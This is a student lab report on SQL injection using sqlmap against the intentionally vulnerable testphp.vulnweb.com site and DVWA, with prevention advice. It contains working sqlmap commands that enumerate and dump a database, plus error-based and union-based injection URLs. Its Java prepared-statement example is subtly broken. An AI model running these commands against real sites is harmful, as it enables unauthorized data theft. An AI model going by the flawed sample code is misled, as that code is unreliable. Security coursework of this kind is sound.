CSE3502- Information Security

Management(L51-L52)

Lab Assessment – 6

SQLMap

Rohit.M.Somani
18BIT0236

Faculty: DR. JEYANTHI N

1: List information about the existing databases sqlmap -u
http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

Comments: Using --dbs commands we get the list of the

databases present in the backend of that particular website

The backend DBMS is MySQL

2: List information about Tables present in a particular

Database sqlmap -u
http:/ testphp.vulnweb.com/listproducts.php?cat=1 -D
acuart --tables

Comments: Using -D acuart we get the columns in the

database of acuart tables.
3: List information about the columns of a particular
table sqlmap -u
http:/ testphp.vulnweb.com/listproducts.php?cat=1 -D
acuart -T artists --columns
 4: Dump the data from the columns sqlmap -u
http:/ testphp.vulnweb.com/listproducts.php?cat=1 -D
acuart -T artists -C aname --dump

Comments: This --dump command finally dumps the

artist name from the vulnerable database.
5: Prevent SQL Injection

Steps to prevent SQL injection attacks

1. Validate User Inputs

A common first step to preventing SQL injection attacks is validating user

inputs. First, identify the essential SQL statements and establish a whitelist for
all valid SQL statements, leaving unvalidated statements out of the query.
This process is known as input validation or query redesign.

2. Sanitize Data By Limiting Special Characters

Another component of safeguarding against SQL injection attacks is

mitigating inadequate data sanitization. Because SQLi attackers can use
unique character sequences to take advantage of a database, sanitizing data
not to allow string concatenation is critical.

3. Enforce Prepared Statements And Parameterization

Sadly, input validation and data sanitization aren’t fix-alls. It’s critical
organizations also use prepared statements with parameterized queries, also
known as variable binding, for writing all database queries. By defining all
SQL code involved with queries, or parameterization, you can distinguish
between user input and code.

4. Use Stored Procedures In The Database

Similar to parameterization, using stored procedures also requires variable
binding. Unlike the prepared statements approach to mitigating SQLi, stored
procedures reside in the database and are called from the web application.
Stored procedures are also not immune to vulnerabilities if dynamic SQL
generation is used.

5. Actively Manage Patches And Updates

Vulnerabilities in applications and databases that are exploitable using SQL

injection are regularly discovered and publicly identified. Like so many
cybersecurity threats, it’s vital organizations stay in tune with the most recent
news and apply patches and updates as soon as practical. For SQLi purposes,
this means keeping all web application software components, including
database server software, frameworks, libraries, plug-ins, and web server
software, up to date.

6: Command Injection Vulnerability and

Mitigation
The vulnerability can be mitigated using a prepared statement to
create a parameterized query as follows:

String query = "SELECT userName, balance "+

"FROM accounts WHERE userID = ?
and password = ?";

try {
PreparedStatement statement = connection.prepareStatement(query);
statement.setInt(1, request.getParameter("userID"));
ResultSet rs = statement.executeQuery();
while (rs.next())
{
page.addTableRow(rs.getString("userName"),
rs.getFloat("balance"));
}
} catch (SQLException e)
{ ... }

If an attacker attempts to give a value to the userID field that is not a

simple integer, then statement.setInt() will throw a SQLException error
rather than permitting the query to complete.

7: SQL Injection

Error based SQL Injection

http://testphp.vulnweb.com/listproducts.php?cat=1%27’
When we paste this address we get the error which is show in the
server end which shouldn’t be shown
Union Based SQL Injection
http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20s
elect%201,2,3,4,5,6,7,8,9,10,11--
Using this command we get the below error

8: Risks associated with SQL injection

SQL injection is the most common threat to Data base system. It lead to

loss of very secured or confidential data. It is nothing but the

unauthorized access to data systems or accounts.

The following are the risks associated with SQL Injection:

1. By Passing Authentication :
It is most important to focus on By Passing Authentication
during the penetration test because the attacker can access to
the database just like an authorized user and he can perform
his desired tasks on the data base.
2. Identifying Injectable Parameters :
The attacker will collect the information about the structure of
the back-end database of a web application and he will include
the dynamic content in to the web site. This may lead the
visitors to install malicious code and may redirect to the
malicious site.
3. Executing Remote Commands :
Executing these remote commands will provide attackers a
tool to execute arbitrary commands on the database.
For example, a remote user can execute stored database
procedures and functions from a remote SQL interactive
interface.
4. Denial of Service :
The attacker can flood the server with requests so that he will
the authority to stop the service to valid users, or he can delete
some data.
5. Database Finger Printing :
The attacker can determine the type of database used in
backend so that he can use database-specific attacks that
corresponds to weakness in a particular DBMS.
9: Authentication Bypass using SQL Injection on Login
Page

For this i installed DVWA to perform SQL injection on

this vulnerable website

We enter user ID 1 as trail and error method

10: Visit the URL below and record your inferences

https://cloudacademy.com/course/sqlmap-sql-injection-tool-the-
basics/sqlmap-sql-injection-tool-the-basics/

This course covers the basics of using SQLmap.

SQLmap is an open-source tool used in penetration testing to detect and

exploit SQL injection flaws. SQLmap automates the process of detecting
and exploiting SQL injection. SQL Injection attacks can take control of
databases that utilize SQL. They can affect any website or web app that
may have a SQL database linked to it, such as MySQL, SQL Server, Oracle
and many others. These databases often contain sensitive data such as
customer information, personal data, tradesecrets, financial data and so
on. Being able to find SQL vulnerabilities, and defend against them, is
vital. SQLmap can help in finding these vulnerabilities.